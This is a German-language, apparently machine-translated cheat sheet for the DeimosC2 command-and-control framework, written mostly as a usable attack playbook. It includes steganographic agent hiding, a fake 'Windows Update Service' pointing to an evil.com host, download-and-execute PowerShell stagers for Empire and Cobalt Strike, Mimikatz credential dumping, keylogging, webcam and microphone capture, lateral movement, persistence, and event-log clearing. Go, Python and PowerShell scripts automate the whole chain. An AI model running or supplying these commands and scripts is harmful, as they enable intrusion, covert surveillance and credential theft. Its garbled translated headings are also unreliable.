DeimosC2 Framework Cheat Sheet¶
Überblick¶
DeimosC2 ist ein Golang-basiertes Post-Exploitation-Befehls- und Kontrollgerüst für rote Team-Operationen und Penetrationstests. DeimosC2 ist mit modernen Architekturprinzipien aufgebaut und konzentriert sich auf die plattformübergreifende Kompatibilität, sichere Kommunikation und umfassende Nachbeschaffungsmöglichkeiten bei gleichzeitiger Aufrechterhaltung eines leichten Fußabdrucks und fortschrittlicher Evasionstechniken.
ZEIT Warnung: Dieses Tool ist nur für autorisierte Penetrationstests und rote Teamübungen gedacht. Stellen Sie sicher, dass Sie eine ordnungsgemäße Autorisierung vor der Verwendung gegen jedes Ziel haben.
Installation¶
Voraussetzungen¶
```bash
Install Go 1.18+ and Git¶
sudo apt update sudo apt install -y golang-go git build-essential
Verify Go installation¶
go version
Set Go environment variables¶
export GOPATH=\(HOME/go export PATH=\)PATH:\(GOPATH/bin echo 'export GOPATH=\)HOME/go' >> ~/.bashrc echo 'export PATH=\(PATH:\)GOPATH/bin' >> ~/.bashrc ```_
Installation von GitHub¶
```bash
Clone DeimosC2 repository¶
git clone https://github.com/DeimosC2/DeimosC2.git cd DeimosC2
Build the server¶
go mod tidy go build -o deimosc2-server ./cmd/server
Build the agent¶
go build -o deimosc2-agent ./cmd/agent
Make executables¶
chmod +x deimosc2-server deimosc2-agent ```_
Docker Installation¶
```bash
Clone repository¶
git clone https://github.com/DeimosC2/DeimosC2.git cd DeimosC2
Build Docker image¶
docker build -t deimosc2 .
Run DeimosC2 container¶
docker run -it --rm -p 8080:8080 -p 443:443 deimosc2
Run with persistent data¶
docker run -it --rm -p 8080:8080 -p 443:443 -v $(pwd)/data:/app/data deimosc2 ```_
Cross-Platform Compilation¶
```bash
Build for Windows (x64)¶
GOOS=windows GOARCH=amd64 go build -o deimosc2-agent.exe ./cmd/agent
Build for Windows (x86)¶
GOOS=windows GOARCH=386 go build -o deimosc2-agent-x86.exe ./cmd/agent
Build for Linux (x64)¶
GOOS=linux GOARCH=amd64 go build -o deimosc2-agent-linux ./cmd/agent
Build for macOS (x64)¶
GOOS=darwin GOARCH=amd64 go build -o deimosc2-agent-macos ./cmd/agent
Build for ARM64¶
GOOS=linux GOARCH=arm64 go build -o deimosc2-agent-arm64 ./cmd/agent ```_
Basisnutzung¶
Start des Servers¶
```bash
Start DeimosC2 server with default settings¶
./deimosc2-server
Start with custom configuration¶
./deimosc2-server -config config.json
Start with specific interface and port¶
./deimosc2-server -host 0.0.0.0 -port 8080
Start with HTTPS¶
./deimosc2-server -tls -cert server.crt -key server.key
Start in debug mode¶
./deimosc2-server -debug ```_
Datei konfigurieren¶
json
\\\\{
"server": \\\\{
"host": "0.0.0.0",
"port": 8080,
"tls": \\\\{
"enabled": true,
"cert_file": "server.crt",
"key_file": "server.key"
\\\\},
"auth": \\\\{
"username": "admin",
"password": "SecurePassword123!"
\\\\}
\\\\},
"database": \\\\{
"type": "sqlite",
"connection": "deimos.db"
\\\\},
"logging": \\\\{
"level": "info",
"file": "deimos.log"
\\\\},
"agents": \\\\{
"check_in_interval": 30,
"jitter": 10,
"max_retries": 5
\\\\}
\\\\}_
Web Interface Zugriff¶
```bash
Access DeimosC2 web interface¶
HTTPS access¶
Default credentials (configurable)¶
Username: admin Password: SecurePassword123! ```_
Agent Deployment¶
Grundlegende Ausführung des Agenten¶
```bash
Windows agent¶
deimosc2-agent.exe -server http://192.168.1.100:8080
Linux agent¶
./deimosc2-agent-linux -server http://192.168.1.100:8080
macOS agent¶
./deimosc2-agent-macos -server http://192.168.1.100:8080
Agent with custom parameters¶
./deimosc2-agent -server https://c2.example.com:443 -interval 60 -jitter 20 ```_
Agent Configuration Optionen¶
```bash
Command line options¶
./deimosc2-agent -h
Options: -server string C2 server URL (required) -interval int Check-in interval in seconds (default: 30) -jitter int Jitter percentage (default: 10) -user-agent string Custom User-Agent string -proxy string Proxy URL (http://proxy:port) -cert string Custom CA certificate file -insecure Skip TLS certificate verification -debug Enable debug logging ```_
Steganographische Bereitstellung¶
```bash
Embed agent in image¶
cat image.jpg deimosc2-agent.exe > hidden.jpg
Extract and execute¶
tail -c +[image_size] hidden.jpg > agent.exe ./agent.exe -server http://192.168.1.100:8080
Embed in PDF¶
cat document.pdf deimosc2-agent.exe > hidden.pdf ```_
Service Installation (Windows)¶
```bash
Install as Windows service¶
sc create "DeimosAgent" binPath= "C:\Windows\Temp\deimosc2-agent.exe -server http://192.168.1.100:8080" start= auto sc start "DeimosAgent"
Install with custom service name¶
sc create "WindowsUpdateService" binPath= "C:\Windows\System32\deimosc2-agent.exe -server https://update.microsoft.com.evil.com:443" start= auto DisplayName= "Windows Update Service" ```_
Befehl und Kontrolle¶
Personalmanagement¶
```bash
List active agents¶
agents list
Get agent information¶
agents info [agent_id]
Execute command on agent¶
agents exec [agent_id] "whoami"
Execute PowerShell on Windows agent¶
agents exec [agent_id] "powershell Get-Process"
Kill agent¶
agents kill [agent_id]
Rename agent¶
agents rename [agent_id] [new_name] ```_
Dateioperationen¶
```bash
Download file from agent¶
download [agent_id] C:\Users\Administrator\Documents\sensitive.docx
Upload file to agent¶
upload [agent_id] payload.exe C:\Windows\Temp\update.exe
List directory contents¶
ls [agent_id] C:\Users\Administrator\Documents
Change directory¶
cd [agent_id] C:\Windows\System32
Create directory¶
mkdir [agent_id] C:\Windows\Temp\data
Remove file¶
rm [agent_id] C:\Windows\Temp\payload.exe ```_
Prozessmanagement¶
```bash
List processes¶
ps [agent_id]
Kill process¶
kill [agent_id] [pid]
Start process¶
start [agent_id] notepad.exe
Process injection¶
inject [agent_id] [pid] [shellcode_file]
Memory dump¶
memdump [agent_id] [pid] output.dmp ```_
Netzwerkaktivitäten¶
```bash
Network discovery¶
discover [agent_id] 192.168.1.0/24
Port scan¶
portscan [agent_id] 192.168.1.100 80,443,22,3389
ARP scan¶
arpscan [agent_id] 192.168.1.0/24
Network interfaces¶
ifconfig [agent_id]
Routing table¶
route [agent_id]
Network connections¶
netstat [agent_id] ```_
Erweiterte Funktionen¶
Persistenzmechanismen¶
```bash
Registry persistence (Windows)¶
persist registry [agent_id] HKCU "Software\Microsoft\Windows\CurrentVersion\Run" "WindowsUpdate" "C:\Windows\Temp\agent.exe"
Scheduled task persistence (Windows)¶
persist schtask [agent_id] "SystemUpdate" "C:\Windows\Temp\agent.exe" "ONLOGON"
Service persistence (Windows)¶
persist service [agent_id] "WindowsUpdateService" "C:\Windows\Temp\agent.exe"
Cron persistence (Linux)¶
persist cron [agent_id] "*/5 * * * * /tmp/agent"
Autostart persistence (Linux)¶
persist autostart [agent_id] "/tmp/agent"
LaunchAgent persistence (macOS)¶
persist launchagent [agent_id] "com.apple.update" "/tmp/agent" ```_
Vorrechte Eskalation¶
```bash
UAC bypass (Windows)¶
elevate uac [agent_id] [payload_path]
Token manipulation (Windows)¶
elevate token [agent_id] [target_pid]
Sudo exploitation (Linux)¶
elevate sudo [agent_id] [command]
SUID exploitation (Linux)¶
elevate suid [agent_id]
Kernel exploits¶
elevate kernel [agent_id] [exploit_name] ```_
Spätere Bewegung¶
```bash
WMI execution (Windows)¶
lateral wmi [agent_id] 192.168.1.100 administrator password123 "whoami"
PSExec execution (Windows)¶
lateral psexec [agent_id] 192.168.1.100 admin pass123 "systeminfo"
PowerShell remoting (Windows)¶
lateral winrm [agent_id] 192.168.1.100 administrator password123 "Get-Process"
SSH execution (Linux/macOS)¶
lateral ssh [agent_id] 192.168.1.50 root password123 "uname -a"
SMB execution¶
lateral smb [agent_id] 192.168.1.100 admin pass123 "dir C:\" ```_
Einrichtende Operationen¶
```bash
Dump credentials (Windows)¶
creds dump [agent_id]
Mimikatz execution (Windows)¶
creds mimikatz [agent_id] "sekurlsa::logonpasswords"
SAM dump (Windows)¶
creds sam [agent_id]
LSA secrets (Windows)¶
creds lsa [agent_id]
Browser credentials¶
creds browser [agent_id]
SSH keys (Linux/macOS)¶
creds ssh [agent_id]
Keychain dump (macOS)¶
creds keychain [agent_id] ```_
Pivoting und Tunneling¶
```bash
SOCKS proxy¶
pivot socks [agent_id] 1080
Port forwarding¶
pivot portfwd [agent_id] 8080 192.168.1.100 80
Reverse port forwarding¶
pivot rportfwd [agent_id] 3389 127.0.0.1 3389
HTTP tunnel¶
pivot http [agent_id] 8080
DNS tunnel¶
pivot dns [agent_id] tunnel.example.com ```_
Datenerhebung¶
```bash
Screenshot¶
screenshot [agent_id]
Keylogger¶
keylog start [agent_id] keylog stop [agent_id] keylog dump [agent_id]
Webcam capture¶
webcam [agent_id]
Microphone recording¶
microphone [agent_id] 60
Clipboard monitoring¶
clipboard [agent_id]
File search¶
search [agent_id] C:\Users *.docx
Registry search¶
regsearch [agent_id] HKLM password ```_
Automatisierung und Schrift¶
Go Automation Script¶
```go package main
import ( "bytes" "encoding/json" "fmt" "io/ioutil" "net/http" "time" )
type DeimosClient struct \\{ BaseURL string Username string Password string HTTPClient *http.Client Token string \\}
type Agent struct \\{
ID string json:"id"
Hostname string json:"hostname"
Username string json:"username"
OS string json:"os"
IP string json:"ip"
Status string json:"status"
\\}
type Command struct \\{
AgentID string json:"agent_id"
Command string json:"command"
Args string json:"args"
\\}
func NewDeimosClient(baseURL, username, password string) *DeimosClient \\{ return &DeimosClient\\{ BaseURL: baseURL, Username: username, Password: password, HTTPClient: &http.Client\\{Timeout: 30 * time.Second\\}, \\} \\}
func (c *DeimosClient) Authenticate() error \\{ authData := map[string]string\\{ "username": c.Username, "password": c.Password, \\}
jsonData, _ := json.Marshal(authData)
resp, err := c.HTTPClient.Post(c.BaseURL+"/api/auth", "application/json", bytes.NewBuffer(jsonData))
if err != nil \\\\{
return err
\\\\}
defer resp.Body.Close()
if resp.StatusCode == 200 \\\\{
var result map[string]string
json.NewDecoder(resp.Body).Decode(&result)
c.Token = result["token"]
return nil
\\\\}
return fmt.Errorf("authentication failed")
\\}
func (c *DeimosClient) GetAgents() ([]Agent, error) \\{ req, _ := http.NewRequest("GET", c.BaseURL+"/api/agents", nil) req.Header.Set("Authorization", "Bearer "+c.Token)
resp, err := c.HTTPClient.Do(req)
if err != nil \\\\{
return nil, err
\\\\}
defer resp.Body.Close()
var agents []Agent
json.NewDecoder(resp.Body).Decode(&agents)
return agents, nil
\\}
func (c *DeimosClient) ExecuteCommand(agentID, command string) error \\{ cmdData := Command\\{ AgentID: agentID, Command: command, \\}
jsonData, _ := json.Marshal(cmdData)
req, _ := http.NewRequest("POST", c.BaseURL+"/api/execute", bytes.NewBuffer(jsonData))
req.Header.Set("Authorization", "Bearer "+c.Token)
req.Header.Set("Content-Type", "application/json")
resp, err := c.HTTPClient.Do(req)
if err != nil \\\\{
return err
\\\\}
defer resp.Body.Close()
return nil
\\}
func (c *DeimosClient) AutomatedRecon(agentID string) \\{ commands := []string\\{ "whoami", "hostname", "pwd", "ps", "ifconfig", "netstat -an", "uname -a", \\}
for _, cmd := range commands \\\\{
fmt.Printf("[+] Executing: %s\n", cmd)
c.ExecuteCommand(agentID, cmd)
time.Sleep(2 * time.Second)
\\\\}
\\}
func (c *DeimosClient) EstablishPersistence(agentID string) \\{ persistenceCommands := []string\\{ "persist registry HKCU \"Software\Microsoft\Windows\CurrentVersion\Run\" \"WindowsUpdate\" \"C:\Windows\Temp\agent.exe\"", "persist schtask \"SystemUpdate\" \"C:\Windows\Temp\agent.exe\" \"ONLOGON\"", "persist service \"WindowsUpdateService\" \"C:\Windows\Temp\agent.exe\"", \\}
for _, cmd := range persistenceCommands \\\\{
fmt.Printf("[+] Establishing persistence: %s\n", cmd)
c.ExecuteCommand(agentID, cmd)
time.Sleep(3 * time.Second)
\\\\}
\\}
func main() \\{ client := NewDeimosClient("http://192.168.1.100:8080", "admin", "SecurePassword123!")
// Authenticate
if err := client.Authenticate(); err != nil \\\\{
fmt.Printf("Authentication failed: %v\n", err)
return
\\\\}
// Get active agents
agents, err := client.GetAgents()
if err != nil \\\\{
fmt.Printf("Failed to get agents: %v\n", err)
return
\\\\}
fmt.Printf("[+] Found %d active agents\n", len(agents))
// Process each agent
for _, agent := range agents \\\\{
fmt.Printf("[+] Processing agent: %s (%s)\n", agent.ID, agent.Hostname)
// Perform reconnaissance
client.AutomatedRecon(agent.ID)
// Establish persistence
client.EstablishPersistence(agent.ID)
// Wait before processing next agent
time.Sleep(10 * time.Second)
\\\\}
\\} ```_
Python Automation Script¶
```python
!/usr/bin/env python3¶
DeimosC2 Python automation script¶
import requests import json import time from urllib3.exceptions import InsecureRequestWarning
Disable SSL warnings¶
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
class DeimosClient: def init(self, base_url, username, password): self.base_url = base_url.rstrip('/') self.username = username self.password = password self.session = requests.Session() self.session.verify = False self.token = None
def authenticate(self):
"""Authenticate with DeimosC2 server"""
auth_data = \\\\{
'username': self.username,
'password': self.password
\\\\}
response = self.session.post(f"\\\\{self.base_url\\\\}/api/auth", json=auth_data)
if response.status_code == 200:
self.token = response.json().get('token')
self.session.headers.update(\\\\{'Authorization': f'Bearer \\\\{self.token\\\\}'\\\\})
print("[+] Authentication successful")
return True
else:
print("[-] Authentication failed")
return False
def get_agents(self):
"""Get list of active agents"""
response = self.session.get(f"\\\\{self.base_url\\\\}/api/agents")
if response.status_code == 200:
return response.json()
return []
def execute_command(self, agent_id, command):
"""Execute command on agent"""
cmd_data = \\\\{
'agent_id': agent_id,
'command': command
\\\\}
response = self.session.post(f"\\\\{self.base_url\\\\}/api/execute", json=cmd_data)
return response.status_code == 200
def download_file(self, agent_id, remote_path, local_path):
"""Download file from agent"""
download_data = \\\\{
'agent_id': agent_id,
'remote_path': remote_path
\\\\}
response = self.session.post(f"\\\\{self.base_url\\\\}/api/download", json=download_data)
if response.status_code == 200:
with open(local_path, 'wb') as f:
f.write(response.content)
return True
return False
def upload_file(self, agent_id, local_path, remote_path):
"""Upload file to agent"""
with open(local_path, 'rb') as f:
files = \\\\{'file': f\\\\}
data = \\\\{
'agent_id': agent_id,
'remote_path': remote_path
\\\\}
response = self.session.post(f"\\\\{self.base_url\\\\}/api/upload", files=files, data=data)
return response.status_code == 200
def automated_recon(self, agent_id):
"""Perform automated reconnaissance"""
commands = [
"whoami",
"hostname",
"pwd",
"ps",
"ifconfig",
"netstat -an",
"uname -a"
]
for cmd in commands:
print(f"[+] Executing: \\\\{cmd\\\\}")
self.execute_command(agent_id, cmd)
time.sleep(2)
def credential_harvesting(self, agent_id):
"""Harvest credentials from agent"""
commands = [
"creds dump",
"creds mimikatz \"sekurlsa::logonpasswords\"",
"creds sam",
"creds browser"
]
for cmd in commands:
print(f"[+] Harvesting credentials: \\\\{cmd\\\\}")
self.execute_command(agent_id, cmd)
time.sleep(5)
def establish_persistence(self, agent_id):
"""Establish persistence on agent"""
persistence_commands = [
'persist registry HKCU "Software\\Microsoft\\Windows\\CurrentVersion\\Run" "WindowsUpdate" "C:\\Windows\\Temp\\agent.exe"',
'persist schtask "SystemUpdate" "C:\\Windows\\Temp\\agent.exe" "ONLOGON"',
'persist service "WindowsUpdateService" "C:\\Windows\\Temp\\agent.exe"'
]
for cmd in persistence_commands:
print(f"[+] Establishing persistence: \\\\{cmd\\\\}")
self.execute_command(agent_id, cmd)
time.sleep(3)
def lateral_movement(self, agent_id, targets):
"""Perform lateral movement"""
for target in targets:
commands = [
f'lateral wmi \\\\{target\\\\} administrator password123 "whoami"',
f'lateral psexec \\\\{target\\\\} admin pass123 "systeminfo"',
f'lateral ssh \\\\{target\\\\} root password123 "uname -a"'
]
for cmd in commands:
print(f"[+] Lateral movement: \\\\{cmd\\\\}")
self.execute_command(agent_id, cmd)
time.sleep(3)
def main(): client = DeimosClient("http://192.168.1.100:8080", "admin", "SecurePassword123!")
# Authenticate
if not client.authenticate():
return
# Get active agents
agents = client.get_agents()
print(f"[+] Found \\\\{len(agents)\\\\} active agents")
# Process each agent
for agent in agents:
agent_id = agent['id']
hostname = agent.get('hostname', 'unknown')
print(f"[+] Processing agent: \\\\{agent_id\\\\} (\\\\{hostname\\\\})")
# Perform reconnaissance
client.automated_recon(agent_id)
# Harvest credentials
client.credential_harvesting(agent_id)
# Establish persistence
client.establish_persistence(agent_id)
# Lateral movement
targets = ["192.168.1.101", "192.168.1.102"]
client.lateral_movement(agent_id, targets)
# Wait before processing next agent
time.sleep(10)
if name == "main": main() ```_
PowerShell Automation¶
```powershell
DeimosC2 PowerShell automation script¶
function Invoke-DeimosAutomation \\{ param( [string]\(ServerURL = "http://192.168.1.100:8080", [string]\)Username = "admin", [string]$Password = "SecurePassword123!" )
# Create web session
$session = New-Object Microsoft.PowerShell.Commands.WebRequestSession
# Authenticate
$authData = @\\\\{
username = $Username
password = $Password
\\\\}|ConvertTo-Json
try \\\\{
$authResponse = Invoke-WebRequest -Uri "$ServerURL/api/auth" -Method POST -Body $authData -ContentType "application/json" -WebSession $session
$token = ($authResponse.Content|ConvertFrom-Json).token
$session.Headers.Add("Authorization", "Bearer $token")
Write-Host "[+] Authentication successful"
\\\\}
catch \\\\{
Write-Error "Authentication failed: $_"
return
\\\\}
# Get active agents
try \\\\{
$agentsResponse = Invoke-WebRequest -Uri "$ServerURL/api/agents" -WebSession $session
$agents = $agentsResponse.Content|ConvertFrom-Json
Write-Host "[+] Found $($agents.Count) active agents"
\\\\}
catch \\\\{
Write-Error "Failed to get agents: $_"
return
\\\\}
# Process each agent
foreach ($agent in $agents) \\\\{
$agentId = $agent.id
$hostname = $agent.hostname
Write-Host "[+] Processing agent: $agentId ($hostname)"
# Reconnaissance commands
$commands = @(
"whoami",
"hostname",
"systeminfo",
"tasklist",
"ipconfig /all",
"netstat -an"
)
foreach ($cmd in $commands) \\\\{
$cmdData = @\\\\{
agent_id = $agentId
command = $cmd
\\\\}|ConvertTo-Json
try \\\\{
Invoke-WebRequest -Uri "$ServerURL/api/execute" -Method POST -Body $cmdData -ContentType "application/json" -WebSession $session
Write-Host "[+] Executed: $cmd"
Start-Sleep -Seconds 2
\\\\}
catch \\\\{
Write-Warning "Failed to execute command '$cmd': $_"
\\\\}
\\\\}
# Establish persistence
$persistenceCommands = @(
'persist registry HKCU "Software\Microsoft\Windows\CurrentVersion\Run" "WindowsUpdate" "C:\Windows\Temp\agent.exe"',
'persist schtask "SystemUpdate" "C:\Windows\Temp\agent.exe" "ONLOGON"'
)
foreach ($cmd in $persistenceCommands) \\\\{
$cmdData = @\\\\{
agent_id = $agentId
command = $cmd
\\\\}|ConvertTo-Json
try \\\\{
Invoke-WebRequest -Uri "$ServerURL/api/execute" -Method POST -Body $cmdData -ContentType "application/json" -WebSession $session
Write-Host "[+] Persistence established: $cmd"
Start-Sleep -Seconds 3
\\\\}
catch \\\\{
Write-Warning "Failed to establish persistence: $_"
\\\\}
\\\\}
# Wait before processing next agent
Start-Sleep -Seconds 10
\\\\}
\\}
Execute automation¶
Invoke-DeimosAutomation ```_
Integration mit anderen Tools¶
Metasploit Integration¶
```bash
Use DeimosC2 for initial access, pivot to Metasploit¶
Generate Metasploit payload¶
msfvenom -p windows/x64/meterpreter/reverse_https LHOST=192.168.1.100 LPORT=8443 -f exe -o meterpreter.exe
Upload via DeimosC2 agent¶
upload [agent_id] meterpreter.exe C:\Windows\Temp\update.exe
Execute Metasploit payload¶
agents exec [agent_id] "C:\Windows\Temp\update.exe"
Handle in Metasploit¶
msfconsole use exploit/multi/handler set payload windows/x64/meterpreter/reverse_https set LHOST 192.168.1.100 set LPORT 8443 run ```_
Integrieren der Welt¶
```bash
Generate Empire stager¶
Use DeimosC2 for initial access, pivot to Empire¶
From DeimosC2 agent¶
agents exec [agent_id] "powershell IEX (New-Object Net.WebClient).DownloadString('http://192.168.1.100/empire_stager.ps1')"
Handle in Empire¶
./empire listeners uselistener http set Host 192.168.1.100 set Port 8080 execute ```_
Cobalt Strike Integration¶
```bash
Beacon integration¶
Generate Cobalt Strike beacon¶
Use DeimosC2 for initial access, pivot to Beacon¶
From DeimosC2 agent¶
agents exec [agent_id] "powershell IEX (New-Object Net.WebClient).DownloadString('http://192.168.1.100/beacon.ps1')"
Handle in Cobalt Strike team server¶
```_
Operationelle Sicherheit¶
Kommunikationssicherheit¶
```bash
Use HTTPS with valid certificates¶
Configure domain fronting¶
Implement certificate pinning¶
Use legitimate user agents¶
Generate SSL certificates¶
openssl req -new -x509 -keyout server.key -out server.crt -days 365 -nodes
Start DeimosC2 with SSL¶
./deimosc2-server -tls -cert server.crt -key server.key ```_
Verkehrsobfukation¶
```bash
Use custom user agents¶
Implement jitter and delays¶
Mimic legitimate traffic patterns¶
Use common ports and protocols¶
Example obfuscated agent execution¶
./deimosc2-agent -server https://cdn.example.com:443 -user-agent "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" -jitter 30 ```_
Anti-Forensik¶
```bash
Clear event logs¶
agents exec [agent_id] "wevtutil cl System" agents exec [agent_id] "wevtutil cl Security" agents exec [agent_id] "wevtutil cl Application"
Clear PowerShell history¶
agents exec [agent_id] "powershell Remove-Item (Get-PSReadlineOption).HistorySavePath -Force"
Timestomping¶
agents exec [agent_id] "powershell $(Get-Item file.exe).LastWriteTime = '01/01/2020 12:00:00'" ```_
Fehlerbehebung¶
Gemeinsame Themen¶
```bash
Agent not connecting¶
- Check firewall rules
- Verify server configuration
- Test network connectivity
- Check certificate issues
Go build issues¶
go mod tidy go clean -cache
SSL certificate issues¶
openssl req -new -x509 -keyout server.key -out server.crt -days 365 -nodes ```_
Debug Mode¶
```bash
Enable debug logging¶
./deimosc2-server -debug
Agent debug mode¶
./deimosc2-agent -debug -server http://192.168.1.100:8080
Check network connectivity¶
telnet 192.168.1.100 8080 ```_
Best Practices¶
Betriebsplanung¶
- **Pre-engagement Setup*: Server und Kompile Agenten vor dem Eingriff konfigurieren
- Agent Management: Deskriptive Agentennamen verwenden und durch Netzwerk organisieren
- ** Kommunikationsprotokolle*: Sichere C2-Kommunikationskanäle erstellen
- Datenhandling: Implementierung einer sicheren Datenerfassung und -speicherung
- **Cleanup-Verfahren*: Plan zur Artefaktentfernung und Wirkstoffreinigung
Sicherheitsüberlegungen¶
```bash
Secure deployment¶
Use strong authentication¶
Enable HTTPS with valid certificates¶
Implement network segmentation¶
Regular security updates¶
Agent management¶
Use unique agent identifiers¶
Implement agent timeouts¶
Regular agent rotation¶
Secure communication channels¶
```_
Dokumentation und Reporting¶
```bash
Operation documentation¶
Maintain agent logs¶
Document all activities¶
Track compromised systems¶
Generate executive reports¶
Artifact tracking¶
Monitor IOCs¶
Document forensic artifacts¶
Implement attribution prevention¶
```_
Ressourcen¶
- DeimosC2 GitHub Repository
- DeimosC2 Dokumentation
- Go Programming Language
- [MITRE ATT&CK Framework](LINK_5_
- (SANS Red Team Operations)(LINK_5)
--
*Dieses Betrügereiblatt bietet eine umfassende Referenz für die Verwendung von DeimosC2 Framework. Stellen Sie immer sicher, dass Sie eine ordnungsgemäße Autorisierung vor der Durchführung von roten Team-Operationen oder Penetrationstests haben. *